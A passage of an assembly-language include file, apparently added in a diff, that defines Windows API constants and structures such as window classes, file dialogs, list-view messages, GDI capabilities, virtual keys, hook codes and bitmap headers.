+GCL_HCURSOR equ -12 +GCL_HICON equ -14 +GCL_HMODULE equ -16 +GCL_CBWNDEXTRA equ -18 +GCL_CBCLSEXTRA equ -20 +GCL_WNDPROC equ -24 +GCL_STYLE equ -26 + +PBM_SETRANGE equ WM_USER+1 +PBM_SETPOS equ WM_USER+2 +PBM_DELTAPOS equ WM_USER+3 +PBM_SETSTEP equ WM_USER+4 +PBM_STEPIT equ WM_USER+5 + +ICON_SMALL equ 0 +DEFAULT_PITCH equ 0 +DEFAULT_QUALITY equ 0 +OEM_CHARSET equ 255 +CLIP_CHARACTER_PRECIS equ 1 +CLIP_DEFAULT_PRECIS equ 0 +OUT_DEFAULT_PRECIS equ 0 + +;******************************************************************* +; +; Window Class +; +;******************************************************************* + +DLGWINDOWEXTRA equ 30 + +WNDCLASSEX STRUCT + wc_cbSize DWORD ? + wc_style DWORD ? + wc_lpfnWndProc DWORD ? + wc_cbClsExtra DWORD ? + wc_cbWndExtra DWORD ? + wc_hInstance DWORD ? + wc_hIcon DWORD ? + wc_hCursor DWORD ? + wc_hbrBackground DWORD ? + wc_lpszMenuName DWORD ? + wc_lpszClassName DWORD ? + wc_hIconSm DWORD ? +WNDCLASSEX ENDS + +;******************************************************************* +; +; Message Structure +; +;******************************************************************* + +MSG STRUCT + msg_hwnd DWORD ? + msg_message DWORD ? + msg_wParam DWORD ? + msg_lParam DWORD ? + msg_time DWORD ? + msg_pt QWORD ? +MSG ENDS + +;******************************************************************* +; +; Open Filename Dialog +; +;******************************************************************* + +OPENFILENAME STRUCT + of_lStructSize DWORD ? + of_hWndOwner DWORD ? + of_hInstance DWORD ? + of_lpstrFilter DWORD ? + of_lpstrCustomFilter DWORD ? + of_nMaxCustFilter DWORD ? + of_nFilterIndex DWORD ? + of_lpstrFile DWORD ? + of_nMaxFile DWORD ? + of_lpstrFileTitle DWORD ? + of_nMaxFileTitle DWORD ? + of_lpstrInitialDir DWORD ? + of_lpstrTitle DWORD ? + of_Flags DWORD ? + of_nFileOffset WORD ? + of_nFileExtension WORD ? + of_lpstrDefExt DWORD ? + of_lCustData DWORD ? + of_lpfnHook DWORD ? + of_lpTemplateName DWORD ? +OPENFILENAME ENDS + +OFN_ALLOWMULTISELECT equ 00000200h +OFN_CREATEPROMPT equ 00002000h +OFN_ENABLEHOOK equ 00000020h +OFN_ENABLETEMPLATE equ 00000040h +OFN_ENABLETEMPLATEHANDLE equ 00000080h +OFN_EXPLORER equ 00080000h +OFN_EXTENSIONDIFFERENT equ 00000400h +OFN_FILEMUSTEXIST equ 00001000h +OFN_HIDEREADONLY equ 00000004h +OFN_LONGNAMES equ 00200000h +OFN_NOCHANGEDIR equ 00000008h +OFN_NODEREFERENCELINKS equ 00100000h +OFN_NOLONGNAMES equ 00040000h +OFN_NONETWORKBUTTON equ 00020000h +OFN_NOREADONLYRETURN equ 00008000h +OFN_NOTESTFILECREATE equ 00010000h +OFN_NOVALIDATE equ 00000100h +OFN_OVERWRITEPROMPT equ 00000002h +OFN_PATHMUSTEXIST equ 00000800h +OFN_READONLY equ 00000001h +OFN_SHAREAWARE equ 00004000h +OFN_SHOWHELP equ 00000010h +OFN_SHAREFALLTHROUGH equ 2 +OFN_SHARENOWARN equ 1 +OFN_SHAREWARN equ 0 + + +;******************************************************************* +; +; List View Control +; +;******************************************************************* + +LVM_GETITEM equ LVM_FIRST + 5 +LVM_GETITEMW equ LVM_FIRST + 75 +LVM_SETITEM equ LVM_FIRST + 6 +LVM_SETITEMW equ LVM_FIRST + 76 +LVM_INSERTITEM equ LVM_FIRST + 7 +LVM_INSERTITEMW equ LVM_FIRST + 77 +LVM_DELETEITEM equ LVM_FIRST + 8 +LVM_DELETEALLITEMS equ LVM_FIRST + 9 +LVM_GETCALLBACKMASK equ LVM_FIRST + 10 +LVM_FIRST equ 1000h +LVM_SETCALLBACKMASK equ LVM_FIRST + 11 +LVM_GETITEMRECT equ LVM_FIRST + 14 +LVM_SETITEMPOSITION equ LVM_FIRST + 15 +LVM_GETITEMPOSITION equ LVM_FIRST + 16 +LVM_GETSTRINGWIDTH equ LVM_FIRST + 17 +LVM_GETSTRINGWIDTHW equ LVM_FIRST + 87 +LVCF_FMT equ 0001h +LVCF_WIDTH equ 0002h +LVCF_TEXT equ 0004h +LVCF_SUBITEM equ 0008h +LVCFMT_LEFT equ 0000h +LVCFMT_RIGHT equ 0001h +LVCFMT_CENTER equ 0002h +LVCFMT_JUSTIFYMASK equ 0003h +LVM_GETCOLUMN equ LVM_FIRST + 25 +LVM_GETCOLUMNW equ LVM_FIRST + 95 +LVM_SETCOLUMN equ LVM_FIRST + 26 +LVM_SETCOLUMNW equ LVM_FIRST + 96 +LVM_INSERTCOLUMN equ LVM_FIRST + 27 +LVM_INSERTCOLUMNW equ LVM_FIRST + 97 +LVM_DELETECOLUMN equ LVM_FIRST + 28 +LVM_GETCOLUMNWIDTH equ LVM_FIRST + 29 +LVIF_TEXT equ 0001h +LVIF_IMAGE equ 0002h +LVIF_PARAM equ 0004h +LVIF_STATE equ 0008h + + + +LV_ITEM STRUC + lvi_imask DWORD ? + lvi_iItem DWORD ? + lvi_iSubItem DWORD ? + lvi_state DWORD ? + lvi_stateMask DWORD ? + lvi_pszText DWORD ? + lvi_cchTextMax DWORD ? + lvi_iImage DWORD ? + lvi_lParam DWORD ? + lvi_iIndent DWORD ? +LV_ITEM ENDS + +LV_FINDINFO STRUC + lvfi_flags DWORD ? + lvfi_psz DWORD ? + lvfi_lParam DWORD ? + lvfi_pt QWORD ? + lvfi_vkDirection DWORD ? +LV_FINDINFO ENDS + +LV_HITTESTINFO STRUC + lvht_pt QWORD ? + lvht_flags DWORD ? + lvht_iItem DWORD ? +LV_HITTESTINFO ENDS + +LV_COLUMN STRUC + lvc_imask DWORD ? + lvc_fmt DWORD ? + lvc_lx DWORD ? + lvc_pszText DWORD ? + lvc_cchTextMax DWORD ? + lvc_iSubItem DWORD ? +LV_COLUMN ENDS + +;******************************************************************* +; +; Rectangle +; +;******************************************************************* + +RECT struc + rcLeft dd ? + rcTop dd ? + rcRight dd ? + rcBottom dd ? +RECT ends + +;******************************************************************* +; +; Window Class structure +; +;******************************************************************* + +WNDCLASS struc + clsStyle dw ? ; class style + clsLpfnWndProc dd ? + clsCbClsExtra dw ? + clsCbWndExtra dw ? + clsHInstance dw ? ; instance handle + clsHIcon dw ? ; class icon handle + clsHCursor dw ? ; class cursor handle + clsHbrBackground dw ? ; class background brush + clsLpszMenuName dd ? ; menu name + clsLpszClassName dd ? ; far ptr to class name +WNDCLASS ends + +IFNDEF NOTEXT +TEXTMETRIC struc + tmHeight dw ? + tmAscent dw ? + tmDescent dw ? + tmIntLeading dw ? + tmExtLeading dw ? + tmAveCharWidth dw ? + tmMaxCharWidth dw ? + tmWeight dw ? + tmItalic db ? + tmUnderlined db ? + tmStruckOut db ? + tmFirstChar db ? + tmLastChar db ? + tmDefaultChar db ? + tmBreakChar db ? + tmPitch db ? + tmCharSet db ? + tmOverhang dw ? + tmAspectX dw ? + tmAspectY dw ? +TEXTMETRIC ends + +LF_FACESIZE EQU 32 + +LOGFONT struc + lfHeight dw ? + lfWidth dw ? + lfEscapement dw ? + lfOrientation dw ? + lfWeight dw ? + lfItalic db ? + lfUnderline db ? + lfStrikeOut db ? + lfCharSet db ? + lfOutPrecision db ? + lfClipPrecision db ? + lfQuality db ? + lfPitchAndFamily db ? + lfFaceName db LF_FACESIZE dup(?) +LOGFONT ends + +LOGBRUSH struc + lbStyle dw ? + lbColor dd ? + lbHatch dw ? +LOGBRUSH ends + +; +; Text Drawing modes +; +TRANSPARENT = 1 +OPAQUE = 2 +; +; Mapping Modes +; +MM_TEXT = 1 +MM_LOMETRIC = 2 +MM_HIMETRIC = 3 +MM_LOENGLISH = 4 +MM_HIENGLISH = 5 +MM_TWIPS = 6 +MM_ISOTROPIC = 7 +MM_ANISOTROPIC = 8 +; +; Coordinate Modes +; +ABSOLUTE = 1 +RELATIVE = 2 +; +; Stock Logical Objects +; +WHITE_BRUSH = 0 +LTGRAY_BRUSH = 1 +GRAY_BRUSH = 2 +DKGRAY_BRUSH = 3 +BLACK_BRUSH = 4 +NULL_BRUSH = 5 +HOLLOW_BRUSH = 5 +WHITE_PEN = 6 +BLACK_PEN = 7 +NULL_PEN = 8 +DOT_MARKER = 9 +OEM_FIXED_FONT = 10 +ANSI_FIXED_FONT = 11 +ANSI_VAR_FONT = 12 +SYSTEM_FONT = 13 +DEVICE_DEFAULT_FONT = 14 +DEFAULT_PALETTE = 15 +SYSTEM_FIXED_FONT = 16 +ENDIF +; +; Brush Styles +; +BS_SOLID = 0 +BS_NULL = 1 +BS_HOLLOW = BS_NULL +BS_HATCHED = 2 +BS_PATTERN = 3 +BS_INDEXED = 4 +BS_DIBPATTERN = 5 +; +; Hatch Styles +; +HS_HORIZONTAL = 0 ; ----- +HS_VERTICAL = 1 ; ||||| +HS_FDIAGONAL = 2 ; \\\\\ +HS_BDIAGONAL = 3 ; ///// +HS_CROSS = 4 ; +++++ +HS_DIAGCROSS = 5 ; xxxxx +; +; Pen Styles +; +PS_SOLID = 0 +PS_DASH = 1 ; ------- +PS_DOT = 2 ; ....... +PS_DASHDOT = 3 ; _._._._ +PS_DASHDOTDOT = 4 ; _.._.._ +PS_NULL = 5 +PS_INSIDEFRAME = 6 +; +; Device Parameters for GetDeviceCaps() +; +DRIVERVERSION =0 ; Device driver version +TECHNOLOGY =2 ; Device classification +HORZSIZE =4 ; Horizontal size in millimeters +VERTSIZE =6 ; Vertical size in millimeters +HORZRES =8 ; Horizontal width in pixels +VERTRES =10 ; Vertical width in pixels +BITSPIXEL =12 ; Number of bits per pixel +PLANES =14 ; Number of planes +NUMBRUSHES =16 ; Number of brushes the device has +NUMPENS =18 ; Number of pens the device has +NUMMARKERS =20 ; Number of markers the device has +NUMFONTS =22 ; Number of fonts the device has +NUMCOLORS =24 ; Number of colors the device supports +PDEVICESIZE =26 ; Size required for device descriptor +CURVECAPS =28 ; Curve capabilities +LINECAPS =30 ; Line capabilities +POLYGONALCAPS =32 ; Polygonal capabilities +TEXTCAPS =34 ; Text capabilities +CLIPCAPS =36 ; Clipping capabilities +RASTERCAPS =38 ; Bitblt capabilities +ASPECTX =40 ; Length of the X leg +ASPECTY =42 ; Length of the Y leg +ASPECTXY =44 ; Length of the hypotenuse + +LOGPIXELSX =88 ; Logical pixels/inch in X +LOGPIXELSY =90 ; Logical pixels/inch in Y + +SIZEPALETTE =104 ; Number of entries in physical palette +NUMRESERVED =106 ; Number of reserved entries in palette +COLORRES =108 ; Actual color resolution +; +ifndef NOGDICAPMASKS +; +; Device Capability Masks: +; +; Device Technologies +DT_PLOTTER = 0 ; /* Vector plotter */ +DT_RASDISPLAY = 1 ; /* Raster display */ +DT_RASPRINTER = 2 ; /* Raster printer */ +DT_RASCAMERA = 3 ; /* Raster camera */ +DT_CHARSTREAM = 4 ; /* Character-stream, PLP */ +DT_METAFILE = 5 ; /* Metafile, VDM */ +DT_DISPFILE = 6 ; /* Display-file */ +; +; Curve Capabilities +CC_NONE = 0 ; /* Curves not supported */ +CC_CIRCLES = 1 ; /* Can do circles */ +CC_PIE = 2 ; /* Can do pie wedges */ +CC_CHORD = 4 ; /* Can do chord arcs */ +CC_ELLIPSES = 8 ; /* Can do ellipese */ +CC_WIDE = 16 ; /* Can do wide lines */ +CC_STYLED = 32 ; /* Can do styled lines */ +CC_WIDESTYLED = 64 ; /* Can do wide styled lines */ +CC_INTERIORS = 128; /* Can do interiors */ +; +; Line Capabilities +LC_NONE = 0 ; /* Lines not supported */ +LC_POLYLINE = 2 ; /* Can do polylines */ +LC_MARKER = 4 ; /* Can do markers */ +LC_POLYMARKER = 8 ; /* Can do polymarkers */ +LC_WIDE = 16 ; /* Can do wide lines */ +LC_STYLED = 32 ; /* Can do styled lines */ +LC_WIDESTYLED = 64 ; /* Can do wide styled lines */ +LC_INTERIORS = 128; /* Can do interiors */ +; +; Polygonal Capabilities +PC_NONE = 0 ; /* Polygonals not supported */ +PC_POLYGON = 1 ; /* Can do polygons */ +PC_RECTANGLE = 2 ; /* Can do rectangles */ +PC_WINDPOLYGON = 4 ; /* Can do winding polygons */ +PC_TRAPEZOID = 4 ; /* Can do trapezoids */ +PC_SCANLINE = 8 ; /* Can do scanlines */ +PC_WIDE = 16 ; /* Can do wide borders */ +PC_STYLED = 32 ; /* Can do styled borders */ +PC_WIDESTYLED = 64 ; /* Can do wide styled borders */ +PC_INTERIORS = 128; /* Can do interiors */ +; +; Polygonal Capabilities */ +CP_NONE = 0 ; /* No clipping of output */ +CP_RECTANGLE = 1 ; /* Output clipped to rects */ +; +; Text Capabilities +TC_OP_CHARACTER = 0001h ; /* Can do OutputPrecision CHARACTER */ +TC_OP_STROKE = 0002h ; /* Can do OutputPrecision STROKE */ +TC_CP_STROKE = 0004h ; /* Can do ClipPrecision STROKE */ +TC_CR_90 = 0008h ; /* Can do CharRotAbility 90 */ +TC_CR_ANY = 0010h ; /* Can do CharRotAbility ANY */ +TC_SF_X_YINDEP = 0020h ; /* Can do ScaleFreedom X_YINDEPENDENT */ +TC_SA_DOUBLE = 0040h ; /* Can do ScaleAbility DOUBLE */ +TC_SA_INTEGER = 0080h ; /* Can do ScaleAbility INTEGER */ +TC_SA_CONTIN = 0100h ; /* Can do ScaleAbility CONTINUOUS */ +TC_EA_DOUBLE = 0200h ; /* Can do EmboldenAbility DOUBLE */ +TC_IA_ABLE = 0400h ; /* Can do ItalisizeAbility ABLE */ +TC_UA_ABLE = 0800h ; /* Can do UnderlineAbility ABLE */ +TC_SO_ABLE = 1000h ; /* Can do StrikeOutAbility ABLE */ +TC_RA_ABLE = 2000h ; /* Can do RasterFontAble ABLE */ +TC_VA_ABLE = 4000h ; /* Can do VectorFontAble ABLE */ +TC_RESERVED = 8000h +; +; Raster Capabilities +RC_BITBLT = 1 ; /* Can do standard BLT. */ +RC_BANDING = 2 ; /* Device requires banding support */ +RC_SCALING = 4 ; /* Device requires scaling support */ +RC_BITMAP64 = 8 ; /* Device can support >64K bitmap */ +RC_GDI20_OUTPUT = 0010h ; /* has 2.0 output calls */ +RC_DI_BITMAP = 0080h ; /* supports DIB to memory */ +RC_PALETTE = 0100h ; /* supports a palette */ +RC_DIBTODEV = 0200h ; /* supports DIBitsToDevice */ +RC_BIGFONT = 0400h ; /* supports >64K fonts */ +RC_STRETCHBLT = 0800h ; /* supports StretchBlt */ +RC_FLOODFILL = 1000h ; /* supports FloodFill */ +RC_STRETCHDIB = 2000h ; /* supports StretchDIBits */ + +endif ;NOGDICAPMASKS + +; palette entry flags +; +PC_RESERVED = 1 ;/* palette index used for animation */ +PC_EXPLICIT = 2 ;/* palette index is explicit to device */ +PC_NOCOLLAPSE = 4 ;/* do not match color to system palette */ + +; DIB color table identifiers +; +DIB_RGB_COLORS = 0 ;/* color table in RGBTriples */ +DIB_PAL_COLORS = 1 ;/* color table in palette indices */ +; + +;constants for Get/SetSystemPaletteUse() +; +SYSPAL_STATIC = 1 +SYSPAL_NOSTATIC = 2 + +; constants for CreateDIBitmap +CBM_INIT = 4 ;/* initialize bitmap */ +; +; Bitmap format constants +BI_RGB = 0 +BI_RLE8 = 1 +BI_RLE4 = 2 +; +; +ANSI_CHARSET = 0 +SYMBOL_CHARSET = 2 +OEM_CHARSET = 255 +; +; styles for CombineRgn +; +RGN_AND = 1 +RGN_OR = 2 +RGN_XOR = 3 +RGN_DIFF = 4 +RGN_COPY = 5 +; +; Predefined cursor & icon IDs +; +IDC_ARROW = 32512 +IDC_IBEAM = 32513 +IDC_WAIT = 32514 +IDC_CROSS = 32515 +IDC_UPARROW = 32516 +IDC_SIZE = 32640 +IDC_ICON = 32641 +IDC_SIZENWSE = 32642 +IDC_SIZENESW = 32643 +IDC_SIZEWE = 32644 +IDC_SIZENS = 32645 + +IDI_APPLICATION = 32512 +IDI_HAND = 32513 +IDI_QUESTION = 32514 +IDI_EXCLAMATION = 32515 +IDI_ASTERISK = 32516 + +; +; OEM Resource Ordinal Numbers */ +; +OBM_CLOSE = 32754 +OBM_UPARROW = 32753 +OBM_DNARROW = 32752 +OBM_RGARROW = 32751 +OBM_LFARROW = 32750 +OBM_REDUCE = 32749 +OBM_ZOOM = 32748 +OBM_RESTORE = 32747 +OBM_REDUCED = 32746 +OBM_ZOOMD = 32745 +OBM_RESTORED = 32744 +OBM_UPARROWD = 32743 +OBM_DNARROWD = 32742 +OBM_RGARROWD = 32741 +OBM_LFARROWD = 32740 +OBM_MNARROW = 32739 +OBM_COMBO = 32738 +OBM_UPARROWI = 32737 +OBM_DNARROWI = 32736 +OBM_RGARROWI = 32735 +OBM_LFARROWI = 32734 + +OBM_OLD_CLOSE = 32767 +OBM_SIZE = 32766 +OBM_OLD_UPARROW = 32765 +OBM_OLD_DNARROW = 32764 +OBM_OLD_RGARROW = 32763 +OBM_OLD_LFARROW = 32762 +OBM_BTSIZE = 32761 +OBM_CHECK = 32760 +OBM_CHECKBOXES = 32759 +OBM_BTNCORNERS = 32758 +OBM_OLD_REDUCE = 32757 +OBM_OLD_ZOOM = 32756 +OBM_OLD_RESTORE = 32755 + +OCR_NORMAL = 32512 +OCR_IBEAM = 32513 +OCR_WAIT = 32514 +OCR_CROSS = 32515 +OCR_UP = 32516 +OCR_SIZE = 32640 +OCR_ICON = 32641 +OCR_SIZENWSE = 32642 +OCR_SIZENESW = 32643 +OCR_SIZEWE = 32644 +OCR_SIZENS = 32645 +OCR_SIZEALL = 32646 +OCR_ICOCUR = 32647 + +OIC_SAMPLE = 32512 +OIC_HAND = 32513 +OIC_QUES = 32514 +OIC_BANG = 32515 +OIC_NOTE = 32516 + +; +; Scroll bar constants +; +SB_HORZ = 0 +SB_VERT = 1 +SB_CTL = 2 +SB_BOTH = 3 +; +; Scroll Commands +; +SB_LINEUP = 0 +SB_LINEDOWN = 1 +SB_PAGEUP = 2 +SB_PAGEDOWN = 3 +SB_THUMBPOSITION = 4 +SB_THUMBTRACK = 5 +SB_TOP = 6 +SB_BOTTOM = 7 +SB_ENDSCROLL = 8 +; +; MessageBox type flags +; +IFNDEF NOMB +MB_OK = 0000H +MB_OKCANCEL = 0001H +MB_ABORTRETRYIGNORE = 0002H +MB_YESNOCANCEL = 0003H +MB_YESNO = 0004H +MB_RETRYCANCEL = 0005H + +MB_ICONHAND = 0010H +MB_ICONQUESTION = 0020H +MB_ICONEXCLAMATION = 0030H +MB_ICONASTERISK = 0040H + +MB_DEFBUTTON1 = 0000H +MB_DEFBUTTON2 = 0100H +MB_DEFBUTTON3 = 0200H + +MB_APPLMODAL = 0000H +MB_SYSTEMMODAL = 1000H +MB_TASKMODAL = 2000H + +MB_NOFOCUS = 8000H + +; +; Conventional dialog box and message box command IDs +; +IDOK = 1 +IDCANCEL = 2 +IDABORT = 3 +IDRETRY = 4 +IDIGNORE = 5 +IDYES = 6 +IDNO = 7 +; +; Flags for OpenFile +; +OF_READ = 0000H +OF_WRITE = 0001H +OF_READWRITE = 0002H +OF_SHARE_COMPAT = 0000H +OF_SHARE_EXCLUSIVE = 0010H +OF_SHARE_DENY_WRITE = 0020H +OF_SHARE_DENY_READ = 0030H +OF_SHARE_DENY_NONE = 0040H +OF_PARSE = 0100H +OF_DELETE = 0200H +OF_VERIFY = 0400H ; Used with OF_REOPEN +OF_SEARCH = 0400H ; Used without OF_REOPEN +OF_CANCEL = 0800H +OF_CREATE = 1000H +OF_PROMPT = 2000H +OF_EXIST = 4000H +OF_REOPEN = 8000H + +TF_FORCEDRIVE = 80H + +OPENSTRUC STRUC +opLen db ? +opDisk db ? +opXtra dw ? +opDate dw ? +opTime dw ? +opFile db 120 dup (?) +OPENSTRUC ENDS +; +; DrawText format flags +; +DT_LEFT = 00H +DT_CENTER = 01H +DT_RIGHT = 02H +DT_TOP = 00H +DT_VCENTER = 04H +DT_BOTTOM = 08H +DT_WORDBREAK = 10H +DT_SINGLELINE = 20H +DT_EXPANDTABS = 40H +DT_TABSTOP = 80H +DT_NOCLIP = 0100H +DT_EXTERNALLEADING = 0200H +DT_CALCRECT = 0400H +DT_NOPREFIX = 0800H +DT_INTERNAL = 1000H +ENDIF + +; +; ExtFloodFill style flags +; +FLOODFILLBORDER = 0 +FLOODFILLSURFACE = 1 + +; +; Memory manager flags +; +LMEM_FIXED = 0000h +LMEM_MOVEABLE = 0002h +LMEM_NOCOMPACT = 0010H +LMEM_NODISCARD = 0020H +LMEM_ZEROINIT = 0040h +LMEM_MODIFY = 0080H +LMEM_DISCARDABLE= 0F00h +LHND = LMEM_MOVEABLE+LMEM_ZEROINIT +LPTR = LMEM_FIXED+LMEM_ZEROINIT +; Flags returned by LocalFlags (in addition to LMEM_DISCARDABLE) +LMEM_DISCARDED = 4000H +LMEM_LOCKCOUNT = 00FFH + +NONZEROLHND = LMEM_MOVEABLE +NONZEROLPTR = LMEM_FIXED + + + +GMEM_FIXED = 0000h +GMEM_MOVEABLE = 0002h +GMEM_NOCOMPACT = 0010h +GMEM_NODISCARD = 0020h +GMEM_ZEROINIT = 0040h +GMEM_MODIFY = 0080h +GMEM_DISCARDABLE= 0100h +GMEM_NOT_BANKED = 1000h +GMEM_DDESHARE = 2000h +GMEM_SHARE = 2000h +GMEM_NOTIFY = 4000h +GMEM_LOWER = GMEM_NOT_BANKED +GHND = GMEM_MOVEABLE+GMEM_ZEROINIT +GPTR = GMEM_FIXED+GMEM_ZEROINIT + +; Flags returned by GlobalFlags (in addition to GMEM_DISCARDABLE) +GMEM_DISCARDED = 4000h +GMEM_LOCKCOUNT = 00FFh + +; Flags returned by GetWinFlags + +WF_PMODE = 0001h +WF_CPU286 = 0002h +WF_CPU386 = 0004h +WF_CPU486 = 0008h +WF_STANDARD = 0010h +WF_WIN286 = 0010h +WF_ENHANCED = 0020h +WF_WIN386 = 0020h +WF_CPU086 = 0040h +WF_CPU186 = 0080h +WF_LARGEFRAME = 0100h +WF_SMALLFRAME = 0200h +WF_80x87 = 0400h +WF_PAGING = 0800h +WF_WLO = 8000h + +; WEP fSystemExit flag values +WEP_SYSTEM_EXIT = 1 +WEP_FREE_DLL = 0 + + +; Virtual Keys, Standard Set + +IFNDEF NOVK +VK_LBUTTON = 01H +VK_RBUTTON = 02H +VK_CANCEL = 03H +VK_BACK = 08H +VK_TAB = 09H +VK_CLEAR = 0cH +VK_RETURN = 0dH +VK_SHIFT = 10H +VK_CONTROL = 11H +VK_MENU = 12H +VK_PAUSE = 13H +VK_CAPITAL = 14H +VK_ESCAPE = 1bH +VK_SPACE = 20H + +VK_PRIOR = 21H +VK_NEXT = 22H +VK_END = 23H +VK_HOME = 24H +VK_LEFT = 25H +VK_UP = 26H +VK_RIGHT = 27H +VK_DOWN = 28H + +; VK_A thru VK_Z are the same as their ASCII equivalents: 'A' thru 'Z' +; VK_0 thru VK_9 are the same as their ASCII equivalents: '0' thru '0' + +VK_PRINT = 2aH +VK_EXECUTE = 2bH +VK_SNAPSHOT = 2ch ; Printscreen key.. +VK_INSERT = 2dH +VK_DELETE = 2eH +VK_HELP = 2fH + +VK_NUMPAD0 = 60H +VK_NUMPAD1 = 61H +VK_NUMPAD2 = 62H +VK_NUMPAD3 = 63H +VK_NUMPAD4 = 64H +VK_NUMPAD5 = 65H +VK_NUMPAD6 = 66H +VK_NUMPAD7 = 67H +VK_NUMPAD8 = 68H +VK_NUMPAD9 = 69H +VK_MULTIPLY = 6AH +VK_ADD = 6BH +VK_SEPARATER = 6CH +VK_SUBTRACT = 6DH +VK_DECIMAL = 6EH +VK_DIVIDE = 6FH + +VK_F1 = 70H +VK_F2 = 71H +VK_F3 = 72H +VK_F4 = 73H +VK_F5 = 74H +VK_F6 = 75H +VK_F7 = 76H +VK_F8 = 77H +VK_F9 = 78H +VK_F10 = 79H +VK_F11 = 7aH +VK_F12 = 7bH +VK_F13 = 7cH +VK_F14 = 7dH +VK_F15 = 7eH +VK_F16 = 7fH +VK_F17 = 80H +VK_F18 = 81H +VK_F19 = 82H +VK_F20 = 83H +VK_F21 = 84H +VK_F22 = 85H +VK_F23 = 86H +VK_F24 = 87H + +VK_NUMLOCK = 90H +VK_SCROLL = 91H +ENDIF + +IFNDEF NOWH + +; SetWindowsHook() codes +WH_MSGFILTER = (-1) +WH_JOURNALRECORD = 0 +WH_JOURNALPLAYBACK = 1 +WH_KEYBOARD = 2 +WH_GETMESSAGE = 3 +WH_CALLWNDPROC = 4 +IFNDEF NOWIN31 +WH_CBT = 5 +WH_SYSMSGFILTER = 6 +WH_MOUSE = 7 +WH_HARDWARE = 8 +WH_DEBUG = 9 +ENDIF +; +; Hook Codes +HC_GETLPLPFN = (-3) +HC_LPLPFNNEXT = (-2) +HC_LPFNNEXT = (-1) +HC_ACTION = 0 +HC_GETNEXT = 1 +HC_SKIP = 2 +HC_NOREM = 3 +HC_NOREMOVE = 3 +HC_SYSMODALON = 4 +HC_SYSMODALOFF = 5 +; +; CBT Hook Codes +HCBT_MOVESIZE = 0 +HCBT_MINMAX = 1 +HCBT_QS = 2 +HCBT_CREATEWND = 3 +HCBT_DESTROYWND = 4 +HCBT_ACTIVATE = 5 +HCBT_CLICKSKIPPED = 6 +HCBT_KEYSKIPPED = 7 +HCBT_SYSCOMMAND = 8 +HCBT_SETFOCUS = 9 + +; +; WH_MSGFILTER Filter Proc Codes +MSGF_DIALOGBOX = 0 +MSGF_MENU = 2 +MSGF_MOVE = 3 +MSGF_SIZE = 4 +MSGF_SCROLLBAR = 5 +MSGF_NEXTWINDOW = 6 +; +; Window Manager Hook Codes +WC_INIT = 1 +WC_SWP = 2 +WC_DEFWINDOWPROC = 3 +WC_MINMAX = 4 +WC_MOVE = 5 +WC_SIZE = 6 +WC_DRAWCAPTION = 7 +; + +; Message Structure used in Journaling +EVENTMSG struc + message dw ? + paramL dw ? + paramH dw ? + time dd ? +EVENTMSG ends + +ENDIF ;NOWH + +; Window field offsets for GetWindowLong() and GetWindowWord() +GWL_WNDPROC = (-4) +GWW_HINSTANCE = (-6) +GWW_HWNDPARENT = (-8) +GWW_ID = (-12) +GWL_STYLE = (-16) +GWL_EXSTYLE = (-20) + +; GetWindow() Constants +GW_HWNDFIRST = 0 +GW_HWNDLAST = 1 +GW_HWNDNEXT = 2 +GW_HWNDPREV = 3 +GW_OWNER = 4 +GW_CHILD = 5 + +; Class field offsets for GetClassLong() and GetClassWord() +GCL_MENUNAME = (-8) +GCW_HBRBACKGROUND = (-10) +GCW_HCURSOR = (-12) +GCW_HICON = (-14) +GCW_HMODULE = (-16) +GCW_CBWNDEXTRA = (-18) +GCW_CBCLSEXTRA = (-20) +GCL_WNDPROC = (-24) +GCW_STYLE = (-26) + +; WinWhere() Area Codes +HTERROR = (-2) +HTTRANSPARENT = (-1) +HTNOWHERE = 0 +HTCLIENT = 1 +HTCAPTION = 2 +HTSYSMENU = 3 +HTGROWBOX = 4 +HTSIZE = HTGROWBOX +HTMENU = 5 +HTHSCROLL = 6 +HTVSCROLL = 7 +HTREDUCE = 8 +HTZOOM = 9 +HTLEFT = 10 +HTRIGHT = 11 +HTTOP = 12 +HTTOPLEFT = 13 +HTTOPRIGHT = 14 +HTBOTTOM = 15 +HTBOTTOMLEFT = 16 +HTBOTTOMRIGHT = 17 +HTSIZEFIRST = HTLEFT +HTSIZELAST = HTBOTTOMRIGHT + + + +;************************************************************************* +; +; Misc structures & constants +; +;************************************************************************* + +IFNDEF NOMST +POINT struc + ptX dw ? + ptY dw ? +POINT ends + +LOGPEN struc + lopnStyle dw ? + lopnWidth db (SIZE POINT) DUP(?) + lopnColor dd ? +LOGPEN ends + + +BITMAP STRUC + bmType DW ? + bmWidth DW ? + bmHeight DW ? + bmWidthBytes DW ? + bmPlanes DB ? + bmBitsPixel DB ? + bmBits DD ? +BITMAP ENDS + +RGBTRIPLE struc + rgbBlue db ? + rgbGreen db ? + rgbRed db ? +RGBTRIPLE ends + +RGBQUAD struc + rgbqBlue db ? + rgbqGreen db ? + rgbqRed db ? + rgbqReserved db ? +RGBQUAD ends + +; structures for defining DIBs +BITMAPCOREHEADER struc + bcSize dd ? + bcWidth dw ? + bcHeight dw ? + bcPlanes dw ? + bcBitCount dw ? +BITMAPCOREHEADER ends + +BITMAPINFOHEADER struc + biSize dd ? + biWidth dd ? + biHeight dd ? + biPlanes dw ? + biBitCount dw ? + + biCompression dd ? + biSizeImage dd ? + biXPelsPerMeter dd ? + biYPelsPerMeter dd ? + biClrUsed dd ? + biClrImportant dd ? +BITMAPINFOHEADER ends + +BITMAPINFO struc + bmiHeader db (SIZE BITMAPINFOHEADER) DUP (?) + bmiColors db ? ; array of RGBQUADs +BITMAPINFO ends + +BITMAPCOREINFO struc + bmciHeader db (SIZE BITMAPCOREHEADER) DUP (?) + bmciColors db ? ; array of RGBTRIPLEs +BITMAPCOREINFO ends + +BITMAPFILEHEADER struc + bfType dw ? + bfSize dd ? + bfReserved1 dw ? + bfReserved2 dw ? + bfOffBits dd ? +BITMAPFILEHEADER ends + + +WNDSTRUC struc + WSwndStyle dd ? + WSwndID dw ? + WSwndText dw ? + WSwndParent dw ? + WSwndInstance dw ? + WSwndClassProc dd ? +WNDSTRUC ends +; +; Message structure +; +MSGSTRUCT struc +msHWND dw ? +msMESSAGE dw ? +msWPARAM dw ? +msLPARAM dd ? +msTIME dd ? +msPT dd ? +MSGSTRUCT ends + +NEWPARMS struc + nprmHwnd dw ? + nprmCmd db ? +NEWPARMS ends +ENDIF + +PAINTSTRUCT STRUC + PShdc DW ? + PSfErase DW ? + PSrcPaint DB size RECT dup(?) + PSfRestore DW ? + PSfIncUpdate DW ? + PSrgbReserved DB 16 dup(?) +PAINTSTRUCT ENDS + + +CREATESTRUCT struc + cs_lpCreateParams 